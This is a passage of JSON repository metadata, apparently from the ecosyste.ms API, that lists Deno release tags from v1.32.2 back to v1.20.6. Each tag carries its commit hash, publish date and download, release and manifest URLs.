s://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/r